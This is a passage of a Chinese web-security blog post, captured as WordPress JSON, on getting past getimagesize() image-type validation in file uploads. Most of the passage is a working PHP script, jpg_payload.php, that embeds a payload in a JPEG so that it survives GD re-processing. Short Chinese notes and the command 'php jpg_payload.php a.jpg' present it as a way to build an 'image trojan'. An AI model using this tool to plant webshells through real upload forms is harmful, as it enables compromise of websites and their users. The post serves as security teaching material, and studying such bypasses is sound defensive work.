&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $dis-&gt;skip($size);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($marker === 0xDA) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $startPos = $dis-&gt;seek();<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $outStreamTmp = <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  substr($outStream, 0, $startPos) . <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $miniPayload . <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  str_repeat(\"\\0\",$nullbytePayloadSize) . <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  substr($outStream, $startPos);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  checkImage('_'.$argv[1], $outStreamTmp, TRUE);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($extraBytes !== 0) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  while((!$dis-&gt;eof())) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($dis-&gt;readByte() === 0xFF) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($dis-&gt;readByte() !== 0x00) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  break;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $stopPos = $dis-&gt;seek() - 2;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $imageStreamSize = $stopPos - $startPos;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $outStream = <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  substr($outStream, 0, $startPos) . <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $miniPayload . <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  substr(<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  str_repeat(\"\\0\",$nullbytePayloadSize).<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  substr($outStream, $startPos, $imageStreamSize),<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  0,<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $nullbytePayloadSize+$imageStreamSize-$extraBytes) . <br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  substr($outStream, $stopPos);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } elseif($correctImage) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $outStream = $outStreamTmp;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } else {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  break;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if(checkImage('payload_'.$argv[1], $outStream)) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die('Success!');<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } else {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  break;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> &nbsp;  unlink('payload_'.$argv[1]);<br> &nbsp;  die('Something\\'s wrong');<br> <br> &nbsp;  function checkImage($filename, $data, $unlink = FALSE) {<br> &nbsp; &nbsp; &nbsp;  global $correctImage;<br> &nbsp; &nbsp; &nbsp;  file_put_contents($filename, $data);<br> &nbsp; &nbsp; &nbsp;  $correctImage = TRUE;<br> &nbsp; &nbsp; &nbsp;  imagecreatefromjpeg($filename);<br> &nbsp; &nbsp; &nbsp;  if($unlink)<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  unlink($filename);<br> &nbsp; &nbsp; &nbsp;  return $correctImage;<br> &nbsp;  }<br> <br> &nbsp;  function custom_error_handler($errno, $errstr, $errfile, $errline) {<br> &nbsp; &nbsp; &nbsp;  global $extraBytes, $correctImage;<br> &nbsp; &nbsp; &nbsp;  $correctImage = FALSE;<br> &nbsp; &nbsp; &nbsp;  if(preg_match('\/(\\d+) extraneous bytes before marker\/', $errstr, $m)) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if(isset($m[1])) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $extraBytes = (int)$m[1];<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br> <br> &nbsp;  class DataInputStream {<br> &nbsp; &nbsp; &nbsp;  private $binData;<br> &nbsp; &nbsp; &nbsp;  private $order;<br> &nbsp; &nbsp; &nbsp;  private $size;<br> <br> &nbsp; &nbsp; &nbsp;  public function __construct($filename, $order = false, $fromString = false) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;binData = '';<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;order = $order;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if(!$fromString) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if(!file_exists($filename) || !is_file($filename))<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die('File not exists ['.$filename.']');<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;binData = file_get_contents($filename);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } else {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;binData = $filename;<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;size = strlen($this-&gt;binData);<br> &nbsp; &nbsp; &nbsp;  }<br> <br> &nbsp; &nbsp; &nbsp;  public function seek() {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  return ($this-&gt;size - strlen($this-&gt;binData));<br> &nbsp; &nbsp; &nbsp;  }<br> <br> &nbsp; &nbsp; &nbsp;  public function skip($skip) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;binData = substr($this-&gt;binData, $skip);<br> &nbsp; &nbsp; &nbsp;  }<br> <br> &nbsp; &nbsp; &nbsp;  public function readByte() {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($this-&gt;eof()) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die('End Of File');<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $byte = substr($this-&gt;binData, 0, 1);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;binData = substr($this-&gt;binData, 1);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  return ord($byte);<br> &nbsp; &nbsp; &nbsp;  }<br> <br> &nbsp; &nbsp; &nbsp;  public function readShort() {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if(strlen($this-&gt;binData) &lt; 2) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  die('End Of File');<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $short = substr($this-&gt;binData, 0, 2);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $this-&gt;binData = substr($this-&gt;binData, 2);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  if($this-&gt;order) {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $short = (ord($short[1]) &lt;&lt; 8) + ord($short[0]);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  } else {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  $short = (ord($short[0]) &lt;&lt; 8) + ord($short[1]);<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  }<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  return $short;<br> &nbsp; &nbsp; &nbsp;  }<br> <br> &nbsp; &nbsp; &nbsp;  public function eof() {<br> &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;  return !$this-&gt;binData||(strlen($this-&gt;binData) === 0);<br> &nbsp; &nbsp; &nbsp;  }<br> &nbsp;  }<br>?&gt;<\/pre>\n\n\n\n<p>\u4f7f\u7528php\u811a\u672c\u521b\u5efa\u4e00\u4e2a\u56fe\u7247\u9a6c<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">php jpg_payload.php a.jpg<\/pre>\n\n\n\n<p>\u540e\u9762\u5c31\u57fa\u672c\u4e00\u81f4\u4e86<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>getimagesize()\u7c7b\u578b\u9a8c\u8bc1 \u8fd9\u4e2a\u51fd\u6570\u529f\u80fd\u4f1a\u5bf9\u76ee\u6807\u6587\u4ef6\u768416\u8fdb\u5236\u53bb\u8fdb\u884c\u4e00\u4e2a\u8bfb\u53d6\uff0c\u53bb\u8bfb\u53d6\u5934\u51e0\u4e2a\u5b57\u7b26\u4e32\u662f\u4e0d\u662f\u7b26\u5408\u56fe\u7247\u7684\u8981\u6c42\u7684  ...<\/p>\n","protected":false},"author":12,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":""},"categories":[31],"tags":[],"class_list":["post-344","post","type-post","status-publish","format-standard","hentry","category-web"],"_links":{"self":[{"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/posts\/344","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/users\/12"}],"replies":[{"embeddable":true,"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/comments?post=344"}],"version-history":[{"count":0,"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/posts\/344\/revisions"}],"wp:attachment":[{"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/media?parent=344"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/categories?post=344"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/index.cmiteam.cn\/index.php\/wp-json\/wp\/v2\/tags?post=344"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}